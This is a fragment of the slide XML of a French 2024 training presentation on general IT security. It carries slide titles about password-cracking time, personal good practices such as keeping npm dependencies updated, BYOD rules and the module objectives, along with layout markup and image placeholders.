          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>POEC Consultant - 2024</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E1C4A8F-21E5-FE8A-4CD1-EA540C124DAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800100" y="553915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Image 5" descr="Une image contenant capture d’écran, texte, Système d’exploitation, conception&#10;&#10;Description générée automatiquement">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7927635A-8B32-0B03-F6B7-92EFE1450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638881" cy="5637404"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1718834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2" name="Straight Connector 7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33" name="Rectangle 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{479833C7-FDE4-4657-B0B1-32BE833C2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0ABE7C0B-A2D9-4202-A524-532DA2E2D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1DC6367E-C128-4D79-B668-8A70A3949C8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81" t="199" r="-281" b="-40"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1258644" y="18"/>
            <a:ext cx="9158514" cy="6857982"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6925D13-C3D0-490E-8C18-020A610EDA4B}"/>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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3100171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75BE1C2-5628-48D6-96C6-84D41C189014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 9" descr="Une image contenant texte, diagramme, capture d’écran, Police&#10;&#10;Description générée automatiquement">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C8D1589-2381-EAFC-5E4F-47B9099BE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078" y="0"/>
            <a:ext cx="9565934" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3294535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Une image contenant texte, capture d’écran, nombre, carte&#10;&#10;Description générée automatiquement">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{686E3799-9BED-5D3F-C79E-36AF1EB4F7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0713" y="1038"/>
            <a:ext cx="9808029" cy="6856962"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9E769CF-2A15-83E2-ACBC-4CD355B2F2CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2548322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Une image contenant capture d’écran&#10;&#10;Description générée automatiquement">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6304E232-831E-F8DD-697D-C933071D05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0420" y="34182"/>
            <a:ext cx="5544351" cy="6823818"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D18D14D3-AAB9-A343-B2B4-68203658BC14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1469994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6295F-8761-5B4F-AB8A-F12E353C5B61}"/>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3E91B1C-EAEB-04B9-076A-4DB3D1B2FED6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 9" descr="Une image contenant texte, diagramme, capture d’écran, Police&#10;&#10;Description générée automatiquement">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D445D04-9839-98A2-41C8-644B5B48C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078" y="0"/>
            <a:ext cx="9565934" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1133371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11">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A590F21-A5BA-477C-9A35-42D4375D745E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695325" y="914557"/>
            <a:ext cx="11320967" cy="705780"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Généralités – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Délai de piratage des mots de passe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Connector 17">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Image" descr="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEC07AB2-71E2-49F3-B9D3-1160D4D42E18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1098528" y="1613822"/>
            <a:ext cx="9994943" cy="4528959"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41F4EC6A-70FF-4B67-8ED3-0994A153E305}"/>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latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="ZoneTexte 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5652ECB-B118-7E97-9706-FABD447658D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9342597" y="6448114"/>
            <a:ext cx="1446835" cy="370390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Source 2020</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="395620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7FFD05-FE00-D188-F537-A9E38C387081}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Espace réservé du contenu 5" descr="Une image contenant texte, capture d’écran, Police, Impression&#10;&#10;Description générée automatiquement">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{779E5D57-1E35-2429-33F0-AA51DC04A9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8393" y="0"/>
            <a:ext cx="9291687" cy="6858000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6407AB5B-BFEA-6F99-28EE-F4E2FE53EF76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="742829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CB512-C971-A048-ACD9-EA3FF6AC3DC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598D54A-0A98-969F-9F70-714BC7A0539C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Généralités – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Quelques bonnes pratiques PERSO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4EB0C11-DE76-732E-DFF2-165EE3042CCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Tenir ses applications à jour : prendre au sérieux les alertes de sécurité dans le terminal (dépendances </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>npm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>) ou reçue par mail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Connaitre les failles communes, pour s'en protéger (chapitre 4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Appliquer un niveau raisonnable de sécurité, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>cf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> principe de Pareto (80 20)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AC66955-32C8-F243-275F-024E37FAD52D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273791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2248A1-667E-45CD-B09A-8E8D82E3F9F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Généralités – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>BYOD (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Bring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Own</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Device</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{462AB5B3-6E3D-4837-936D-030D40E80169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Respecter  la vie privée des collaborateurs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Vérifier les mises à jour de sécurité des équipements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Formaliser les responsabilités et préciser les précautions dans une charte.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Soumettre l'utilisation des équipements personnels à l’autorisation d’un manager.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21B7ED6E-017F-4C88-865C-407E7AD3F8F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="293690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2248A1-667E-45CD-B09A-8E8D82E3F9F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Généralités – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>WOOCLAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Espace réservé du contenu 5" descr="Une image contenant texte, capture d’écran, Police, ligne&#10;&#10;Description générée automatiquement">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2AD7D9E-A950-043F-E55F-13D8406221C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0635" y="1854926"/>
            <a:ext cx="10860490" cy="4609537"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21B7ED6E-017F-4C88-865C-407E7AD3F8F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2033981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3CA38D-7BB0-4D35-BE00-0F48766027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EC64563-7B3D-4496-80A6-E449ADA098A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="922096"/>
            <a:ext cx="10691265" cy="1371030"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Objectif du module</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
